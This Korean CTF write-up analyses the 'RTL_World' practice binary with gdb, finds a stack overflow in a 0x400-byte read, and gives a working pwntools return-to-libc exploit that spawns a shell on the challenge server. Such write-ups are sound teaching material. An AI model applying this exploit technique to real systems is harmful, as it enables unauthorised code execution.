
[HackCTF] RTL_World

d2n0s4ur 2021. 8. 8. 14:00

gdb를 이용해 바이너리의 main 함수를 디스어셈블하자. (주소가 0x0804xxxx로 고정되어 있으므로 PIE가 적용되지 않은 32비트 바이너리다.)

 

   0x08048983 <+0>:     push   ebp
   0x08048984 <+1>:     mov    ebp,esp
   0x08048986 <+3>:     sub    esp,0xa0
   0x0804898c <+9>:     mov    eax,ds:0x804b060
   0x08048991 <+14>:    mov    DWORD PTR [esp+0xc],0x0
   0x08048999 <+22>:    mov    DWORD PTR [esp+0x8],0x2
   0x080489a1 <+30>:    mov    DWORD PTR [esp+0x4],0x0
   0x080489a9 <+38>:    mov    DWORD PTR [esp],eax
   0x080489ac <+41>:    call   0x8048600 <setvbuf@plt>
   0x080489b1 <+46>:    mov    DWORD PTR [ebp-0x8],0x0
   0x080489b8 <+53>:    mov    DWORD PTR [esp+0x4],0x1
   0x080489c0 <+61>:    mov    DWORD PTR [esp],0x8048e8c
   0x080489c7 <+68>:    call   0x8048630 <dlopen@plt>
   0x080489cc <+73>:    mov    DWORD PTR [ebp-0x8],eax
   0x080489cf <+76>:    mov    DWORD PTR [esp+0x4],0x8048eaa
   0x080489d7 <+84>:    mov    eax,DWORD PTR [ebp-0x8]
   0x080489da <+87>:    mov    DWORD PTR [esp],eax
   0x080489dd <+90>:    call   0x80485f0 <dlsym@plt>
   0x080489e2 <+95>:    mov    DWORD PTR [ebp-0xc],eax
   0x080489e5 <+98>:    mov    eax,DWORD PTR [ebp-0x8]
   0x080489e8 <+101>:   mov    DWORD PTR [esp],eax
   0x080489eb <+104>:   call   0x8048590 <dlclose@plt>
   0x080489f0 <+109>:   mov    eax,DWORD PTR [ebp-0xc]
   0x080489f3 <+112>:   mov    DWORD PTR [ebp-0x4],eax
   0x080489f6 <+115>:   jmp    0x80489fc <main+121>
   0x080489f8 <+117>:   add    DWORD PTR [ebp-0x4],0x1
   0x080489fc <+121>:   mov    eax,DWORD PTR [ebp-0x4]
   0x080489ff <+124>:   mov    DWORD PTR [esp+0x8],0x8
   0x08048a07 <+132>:   mov    DWORD PTR [esp+0x4],0x8048eb1
   0x08048a0f <+140>:   mov    DWORD PTR [esp],eax
   0x08048a12 <+143>:   call   0x8048580 <memcmp@plt>
   0x08048a17 <+148>:   test   eax,eax
   0x08048a19 <+150>:   jne    0x80489f8 <main+117>
   0x08048a1b <+152>:   mov    DWORD PTR [esp],0x8048eb9
   0x08048a22 <+159>:   call   0x80485a0 <puts@plt>
   0x08048a27 <+164>:   mov    DWORD PTR [esp],0x8048ed8
   0x08048a2e <+171>:   call   0x80485a0 <puts@plt>
   0x08048a33 <+176>:   mov    DWORD PTR [esp],0x8048f0c
   0x08048a3a <+183>:   call   0x80485a0 <puts@plt>
   0x08048a3f <+188>:   mov    DWORD PTR [esp],0x8048f38
   0x08048a46 <+195>:   call   0x80485a0 <puts@plt>
   0x08048a4b <+200>:   mov    DWORD PTR [esp],0x8048f58
   0x08048a52 <+207>:   call   0x80485a0 <puts@plt>
   0x08048a57 <+212>:   mov    eax,ds:0x804b04c
   0x08048a5c <+217>:   mov    DWORD PTR [esp+0x4],eax
   0x08048a60 <+221>:   mov    DWORD PTR [esp],0x8048f74
   0x08048a67 <+228>:   call   0x8048570 <printf@plt>
   0x08048a6c <+233>:   jmp    0x8048a6f <main+236>
   0x08048a6e <+235>:   nop
   0x08048a6f <+236>:   call   0x804873d <Menu>
   0x08048a74 <+241>:   mov    DWORD PTR [esp],0x8048f84
   0x08048a7b <+248>:   call   0x8048570 <printf@plt>
   0x08048a80 <+253>:   lea    eax,[ebp-0x90]
   0x08048a86 <+259>:   mov    DWORD PTR [esp+0x4],eax
   0x08048a8a <+263>:   mov    DWORD PTR [esp],0x8048dd9
   0x08048a91 <+270>:   call   0x8048620 <__isoc99_scanf@plt>
   0x08048a96 <+275>:   mov    eax,DWORD PTR [ebp-0x90]
   0x08048a9c <+281>:   cmp    eax,0x6
   0x08048a9f <+284>:   ja     0x8048a6e <main+235>
   0x08048aa1 <+286>:   mov    eax,DWORD PTR [eax*4+0x80490cc]
   0x08048aa8 <+293>:   jmp    eax
   0x08048aaa <+295>:   mov    DWORD PTR [esp],0x8048f89
   0x08048ab1 <+302>:   call   0x80485b0 <system@plt>
   0x08048ab6 <+307>:   mov    DWORD PTR [esp],0x8048f8f
   0x08048abd <+314>:   call   0x80485a0 <puts@plt>
   0x08048ac2 <+319>:   mov    DWORD PTR [esp],0x8048f9e
   0x08048ac9 <+326>:   call   0x80485a0 <puts@plt>
   0x08048ace <+331>:   mov    DWORD PTR [esp],0x8048fb7
   0x08048ad5 <+338>:   call   0x80485a0 <puts@plt>
   0x08048ada <+343>:   mov    DWORD PTR [esp],0x8048fcf
   0x08048ae1 <+350>:   call   0x80485a0 <puts@plt>
   0x08048ae6 <+355>:   mov    DWORD PTR [esp],0x8048fe9
   0x08048aed <+362>:   call   0x80485a0 <puts@plt>
   0x08048af2 <+367>:   mov    DWORD PTR [esp],0x8048ffe
   0x08048af9 <+374>:   call   0x80485a0 <puts@plt>
   0x08048afe <+379>:   mov    DWORD PTR [esp],0x804901b
   0x08048b05 <+386>:   call   0x80485a0 <puts@plt>
   0x08048b0a <+391>:   mov    eax,DWORD PTR [ebp-0x8]
   0x08048b0d <+394>:   mov    DWORD PTR [esp+0x4],eax
   0x08048b11 <+398>:   mov    DWORD PTR [esp],0x8049029
   0x08048b18 <+405>:   call   0x8048570 <printf@plt>
   0x08048b1d <+410>:   mov    DWORD PTR [esp],0x8049044
   0x08048b24 <+417>:   call   0x80485a0 <puts@plt>
   0x08048b29 <+422>:   jmp    0x8048c0b <main+648>
   0x08048b2e <+427>:   mov    eax,ds:0x804b04c
   0x08048b33 <+432>:   mov    DWORD PTR [esp],eax
   0x08048b36 <+435>:   call   0x80487a5 <Get_Money>
   0x08048b3b <+440>:   jmp    0x8048c0b <main+648>
   0x08048b40 <+445>:   mov    eax,ds:0x804b04c
   0x08048b45 <+450>:   cmp    eax,0x7cf
   0x08048b4a <+455>:   jle    0x8048b73 <main+496>
   0x08048b4c <+457>:   mov    eax,ds:0x804b04c
   0x08048b51 <+462>:   sub    eax,0x7cf
   0x08048b56 <+467>:   mov    ds:0x804b04c,eax
   0x08048b5b <+472>:   mov    eax,DWORD PTR [ebp-0xc]
   0x08048b5e <+475>:   mov    DWORD PTR [esp+0x4],eax
   0x08048b62 <+479>:   mov    DWORD PTR [esp],0x8049067
   0x08048b69 <+486>:   call   0x8048570 <printf@plt>
   0x08048b6e <+491>:   jmp    0x8048c0b <main+648>
   0x08048b73 <+496>:   mov    DWORD PTR [esp],0x804907a
   0x08048b7a <+503>:   call   0x80485a0 <puts@plt>
   0x08048b7f <+508>:   jmp    0x8048c0b <main+648>
   0x08048b84 <+513>:   mov    eax,ds:0x804b04c
   0x08048b89 <+518>:   cmp    eax,0xbb7
   0x08048b8e <+523>:   jle    0x8048bb4 <main+561>
   0x08048b90 <+525>:   mov    eax,ds:0x804b04c
   0x08048b95 <+530>:   sub    eax,0xbb7
   0x08048b9a <+535>:   mov    ds:0x804b04c,eax
   0x08048b9f <+540>:   mov    eax,DWORD PTR [ebp-0x4]
   0x08048ba2 <+543>:   mov    DWORD PTR [esp+0x4],eax
   0x08048ba6 <+547>:   mov    DWORD PTR [esp],0x8049094
   0x08048bad <+554>:   call   0x8048570 <printf@plt>
   0x08048bb2 <+559>:   jmp    0x8048c0b <main+648>
   0x08048bb4 <+561>:   mov    DWORD PTR [esp],0x804907a
   0x08048bbb <+568>:   call   0x80485a0 <puts@plt>
   0x08048bc0 <+573>:   jmp    0x8048c0b <main+648>
   0x08048bc2 <+575>:   mov    DWORD PTR [esp],0x80490a6
   0x08048bc9 <+582>:   call   0x8048570 <printf@plt>
   0x08048bce <+587>:   mov    DWORD PTR [esp+0x8],0x400
   0x08048bd6 <+595>:   lea    eax,[ebp-0x8c]
   0x08048bdc <+601>:   mov    DWORD PTR [esp+0x4],eax
   0x08048be0 <+605>:   mov    DWORD PTR [esp],0x0
   0x08048be7 <+612>:   call   0x8048560 <read@plt>
   0x08048bec <+617>:   mov    eax,0x0
   0x08048bf1 <+622>:   jmp    0x8048c10 <main+653>
   0x08048bf3 <+624>:   mov    DWORD PTR [esp],0x80490b2
   0x08048bfa <+631>:   call   0x80485a0 <puts@plt>
   0x08048bff <+636>:   mov    DWORD PTR [esp],0x0
   0x08048c06 <+643>:   call   0x80485d0 <exit@plt>
   0x08048c0b <+648>:   jmp    0x8048a6e <main+235>
   0x08048c10 <+653>:   leave
   0x08048c11 <+654>:   ret

 

하나하나씩 차근차근 분석해본 결과, 메뉴에서 5를 선택하면 `read(0, buf, 0x400)`으로 입력을 받는다.

그런데 buf는 `ebp-0x8c`에 위치하는데 0x400바이트까지 읽어들이므로 스택 버퍼 오버플로우가 발생한다. main의 프롤로그에 카나리(`gs:0x14`) 검사가 없고, read 직후 `mov eax,0` → `leave` → `ret`으로 곧바로 리턴하기 때문에 덮어쓴 리턴 주소가 그대로 사용된다.

이때 리턴 주소를 system@plt로 돌리는 RTL(Return-to-Libc) 기법을 쓰면 shell을 얻을 수 있을 것으로 기대된다.

 

 

 

 

gdb를 활용해 system@plt 주소와 '/bin/sh' 문자열의 주소를 찾는다. system은 main 안에서 직접 호출되므로 PLT 엔트리(0x80485b0)를 그대로 쓸 수 있고, '/bin/sh'는 PLT가 아니라 main+132의 memcmp 인자(0x8048eb1, 길이 8)로 바이너리 .rodata에 들어 있는 문자열이다. 두 주소 모두 바이너리 안에 고정되어 있어 libc 주소 릭이 필요 없다.

system_plt = 0x80485b0
binsh = 0x8048eb1

 

 

   0x08048bd6 <+595>:   lea    eax,[ebp-0x8c]
   0x08048bdc <+601>:   mov    DWORD PTR [esp+0x4],eax
   0x08048be0 <+605>:   mov    DWORD PTR [esp],0x0
   0x08048be7 <+612>:   call   0x8048560 <read@plt>

buf가 `ebp-0x8c`에 있으므로 buf 시작부터 saved EBP까지의 거리가 0x8c임을 알 수 있다. (read가 0x400바이트를 읽으므로 이 거리를 넘어 쓸 수 있다.)

이때 32비트 바이너리이므로 saved EBP(SFP)가 4바이트를 차지한다. 따라서 리턴 주소에 도달하려면 총 0x8c+4만큼을 더미 값으로 채워야 한다.

system 함수가 호출된 뒤 돌아갈 리턴 주소는 shell이 떠 있는 한 의미가 없으므로, 그 자리(system의 리턴 주소)는 아무 값 4바이트로 채워준다.

이후 system의 첫 번째 인자 자리에 '/bin/sh' 문자열의 주소를 넣어주면 `[더미 0x8c+4][system@plt][더미 4바이트][&"/bin/sh"]` 형태의 payload가 완성된다.

 

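from pwn import *

# HackCTF RTL_World exploit.
#
# main() in the 32-bit, non-PIE binary reaches read(0, buf, 0x400) through
# one menu entry, with buf at ebp-0x8c and no stack canary in the prologue.
# After the read, main returns via leave/ret, so bytes past the saved ebp
# overwrite the return address.  Both system@plt and a "/bin/sh" string are
# inside the binary, so no libc leak is needed.

# p = process('./rtl_world')
p = remote("ctf.j0n9hyun.xyz", 3010)

system_plt = 0x80485b0   # system@plt, the call target used by main itself
binsh = 0x8048eb1        # "/bin/sh" in .rodata (memcmp argument at main+132)

BUF_TO_SAVED_EBP = 0x8c  # buf lives at ebp-0x8c
SAVED_EBP_SIZE = 4       # saved ebp sits between buf and the return address

# Pick the menu entry that performs the unbounded read.
# Bytes are used throughout: modern pwntools warns on (or rejects) str here.
p.sendline(b'5')
p.recvuntil(b'[Attack] > ')

# Classic 32-bit ret2libc frame:
#   [padding][system@plt][fake return address][pointer to "/bin/sh"]
payload = b'a' * (BUF_TO_SAVED_EBP + SAVED_EBP_SIZE)
payload += p32(system_plt)   # overwritten return address of main
payload += b'aaaa'           # return address for system(); irrelevant once we have a shell
payload += p32(binsh)        # first argument to system()

p.sendline(payload)

p.interactive()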

 

 

 

FLAG : HackCTF{17_w45_4_6r347_r7l_w0rld}
